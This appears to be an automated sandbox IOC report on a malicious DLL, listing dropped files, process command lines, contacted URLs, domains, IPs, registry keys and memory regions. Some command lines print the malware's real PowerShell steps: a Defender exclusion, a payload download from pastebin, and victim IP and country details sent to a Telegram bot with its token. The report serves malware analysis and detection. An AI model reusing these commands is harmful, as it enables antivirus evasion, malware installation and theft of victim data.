IOC Report
SystemCoreHelper.dll

loading gif

Files

File Path
Type
Category
Malicious
SystemCoreHelper.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.0.cs
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline
Unicode text, UTF-8 (with BOM) text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.0.cs
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\gdi32.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\Temp\mxtvcgq32fe.exe
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Windows\Temp\zbjnkzvo4cc.exe
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_mxtvcgq32fe.exe_2711dd6c6a3b59b8793a33de2e9dd423a0e18fda_3fac82b3_3bc73dfe-16ee-4cd7-86e6-7d6e4a7cc3f2\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_zbjnkzvo4cc.exe_91fe3a34c9bbb1a5c2a345995be1177710a47ccf_18147d42_94eee511-b823-4a99-9fbc-9de814976ec1\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9937.tmp.dmp
Mini DuMP crash report, 15 streams, Sat Nov 23 11:47:23 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9ADE.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B0E.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA136.tmp.dmp
Mini DuMP crash report, 15 streams, Sat Nov 23 11:47:25 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA221.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA241.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
CSV text
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.out
Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RES42BA.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Sat Nov 23 13:09:39 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RES4E05.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Sat Nov 23 13:09:42 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13fc3ogo.uak.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15jqxtjq.hkd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1orbsapq.wyl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2o43gfxp.h4v.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2sjpdqgj.h4g.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a05cgiua.zdo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a52qms5h.fjq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqav4vig.c53.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_icvqyrfv.zpf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kdbur53d.kdq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kp5tco20.szp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kviy4fw3.e32.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0ckb41q.zwv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojrbkcgi.itt.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqnzesou.fjq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pndwk0xa.t55.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxo3gpyr.d4u.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqaz4qom.22v.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rrsxaunj.nde.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rtlrdxqq.eqw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlwrwphu.4pp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjuks1mu.5zg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yskoygp4.sbn.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zl5m4w5j.y0x.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline
Unicode text, UTF-8 (with BOM) text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.out
Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
modified
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
\Device\ConDrv
ASCII text, with CRLF, LF line terminators
dropped
There are 42 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled
malicious
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
malicious
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",GetCompiled
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"
malicious
C:\Windows\Temp\zbjnkzvo4cc.exe
"C:\Windows\Temp\zbjnkzvo4cc.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
malicious
C:\Windows\Temp\mxtvcgq32fe.exe
"C:\Windows\Temp\mxtvcgq32fe.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'"
malicious
C:\Windows\System32\loaddll32.exe
loaddll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES42BA.tmp" "c:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4E05.tmp" "c:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 1232
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 1212
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 29 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://frogs-severz.sbs/api
104.21.88.250
malicious
http://192.81.132.76/b.exe
192.81.132.76
malicious
https://frogs-severz.sbs/api7M
unknown
https://duckduckgo.com/chrome_newtab
unknown
https://duckduckgo.com/ac/?q=
unknown
https://api.telegram.org/bot
unknown
https://go.microsoft.co
unknown
https://revirepart.biz/
unknown
https://contoso.com/License
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
unknown
https://frogs-severz.sbs/apibubM
unknown
http://crl.micro/
unknown
https://pastebin.com/raw/nqfy14gm
unknown
https://pastebin.com/rawNQfY14gm
unknown
https://ipinfo.io/iphZ_l
unknown
https://revirepart.biz/api
172.67.184.174
https://frogs-severz.sbs/apis
unknown
http://x1.c.lencr.org/0
unknown
http://x1.i.lencr.org/0
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
http://www.microsoft.co1
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://frogs-severz.sbs/((
unknown
https://frogs-severz.sbs/9
unknown
https://support.mozilla.org/products/firefoxgro.all
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://nuget.org/NuGet.exe
unknown
http://192.81.132.76
unknown
https://ipinfo.io/countryhZ_l
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://frogs-severz.sbs/apiV
unknown
https://go.micro
unknown
http://ipinfo.io
unknown
https://contoso.com/Icon
unknown
http://www.microsoft.cou
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0
unknown
http://ocsp.rootca1.amazontrust.com0:
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
unknown
https://www.ecosia.org/newtab/
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://github.com/Pester/Pester
unknown
https://ipinfo.io
unknown
https://frogs-severz.sbs:443/api
unknown
http://crl.mi
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://ipinfo.io/country
34.117.59.81
https://frogs-severz.sbs/
unknown
https://aka.ms/pscore6lBdq
unknown
revirepart.biz
https://support.microsof
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?
unknown
https://pastebin.com/raw/NQfY14gm
104.20.3.235
https://frogs-severz.sbs/s
unknown
https://ipinfo.i
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
unknown
http://pastebin.com
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://pastebin.com
unknown
https://ipinfo.io/ip
34.117.59.81
There are 57 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
frogs-severz.sbs
104.21.88.250
malicious
ipinfo.io
34.117.59.81
revirepart.biz
172.67.184.174
api.telegram.org
149.154.167.220
pastebin.com
104.20.3.235

IPs

IP
Domain
Country
Malicious
192.81.132.76
unknown
United States
malicious
104.21.88.250
frogs-severz.sbs
United States
malicious
104.20.3.235
pastebin.com
United States
149.154.167.220
api.telegram.org
United Kingdom
34.117.59.81
ipinfo.io
United States
172.67.184.174
revirepart.biz
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
ProgramId
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
FileId
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
LowerCaseLongPath
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
LongPathHash
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
Name
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
OriginalFileName
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
Publisher
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
Version
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
BinFileVersion
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
BinaryType
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
ProductName
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
ProductVersion
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
LinkDate
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
BinProductVersion
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
AppxPackageFullName
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
AppxPackageRelativeId
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
Size
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
Language
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\zbjnkzvo4cc.exe|9a9c3855725aaefc
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
TickCount
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
ProgramId
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
FileId
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
LowerCaseLongPath
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
LongPathHash
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
Name
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
OriginalFileName
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
Publisher
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
Version
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
BinFileVersion
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
BinaryType
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
ProductName
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
ProductVersion
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
LinkDate
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
BinProductVersion
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
AppxPackageFullName
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
AppxPackageRelativeId
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
Size
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
Language
\REGISTRY\A\{58ed2a92-54b4-06b4-15ce-d16f7bdfb2c3}\Root\InventoryApplicationFile\mxtvcgq32fe.exe|2e0a60569c3d5f02
Usn
There are 45 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
68C11000
unkown
page read and write
malicious
7B00000
trusted library allocation
page read and write
526E000
stack
page read and write
58F2000
trusted library allocation
page read and write
6D40000
heap
page read and write
6B90000
heap
page read and write
5330000
heap
page execute and read and write
51AB000
trusted library allocation
page read and write
549E000
stack
page read and write
4E9D000
trusted library allocation
page execute and read and write
8F4D000
stack
page read and write
8104000
heap
page read and write
7B90000
trusted library allocation
page read and write
6BB0000
heap
page read and write
A00000
heap
page read and write
5191000
trusted library allocation
page read and write
6B0E000
stack
page read and write
4BC8000
trusted library allocation
page read and write
8660000
trusted library allocation
page read and write
B60000
heap
page read and write
7F5A000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
B10000
heap
page read and write
5000000
heap
page read and write
7C07000
heap
page read and write
7F3000
trusted library allocation
page execute and read and write
297B000
heap
page read and write
88CE000
trusted library allocation
page read and write
297C000
heap
page read and write
87C000
stack
page read and write
838F000
trusted library allocation
page read and write
46A2000
trusted library allocation
page read and write
746D000
stack
page read and write
4B2000
unkown
page readonly
7B00000
trusted library allocation
page execute and read and write
88C0000
trusted library allocation
page read and write
8AE2000
heap
page read and write
7C32000
trusted library allocation
page read and write
51EB000
trusted library allocation
page read and write
2A3A000
trusted library allocation
page read and write
7C0000
heap
page read and write
DDD000
stack
page read and write
697F000
stack
page read and write
3405000
heap
page read and write
3557000
heap
page read and write
3352000
heap
page read and write
895D000
stack
page read and write
88CF000
stack
page read and write
299E000
heap
page read and write
6F9B0000
unkown
page readonly
E2E000
stack
page read and write
298D000
heap
page read and write
7C89000
heap
page read and write
77CA000
heap
page read and write
4EEE000
stack
page read and write
5894000
trusted library allocation
page read and write
7BD6000
heap
page read and write
89D0000
trusted library allocation
page execute and read and write
801E000
stack
page read and write
569D000
heap
page read and write
78FE000
stack
page read and write
534E000
trusted library allocation
page read and write
359E000
stack
page read and write
8EAA000
trusted library allocation
page read and write
4330000
remote allocation
page read and write
51EE000
stack
page read and write
C18000
heap
page read and write
60CA000
trusted library allocation
page read and write
89E9000
trusted library allocation
page read and write
6561000
trusted library allocation
page read and write
756B000
stack
page read and write
6371000
trusted library allocation
page read and write
2C13000
heap
page read and write
743D000
stack
page read and write
75ED000
stack
page read and write
77B3000
heap
page read and write
7833000
heap
page read and write
7A00000
heap
page read and write
7D40000
trusted library allocation
page read and write
8CD0000
trusted library allocation
page read and write
7F50000
trusted library allocation
page read and write
C92000
heap
page read and write
6E2D000
stack
page read and write
29EE000
stack
page read and write
8050000
heap
page read and write
79CE000
stack
page read and write
7E90000
trusted library allocation
page read and write
8CCE000
stack
page read and write
6F07000
heap
page read and write
3625000
trusted library allocation
page execute and read and write
8B6A000
heap
page read and write
4D1B000
trusted library allocation
page read and write
2A5E000
stack
page read and write
698D000
stack
page read and write
934000
heap
page read and write
6F80000
trusted library allocation
page read and write
6260000
trusted library allocation
page read and write
4D4D000
trusted library allocation
page read and write
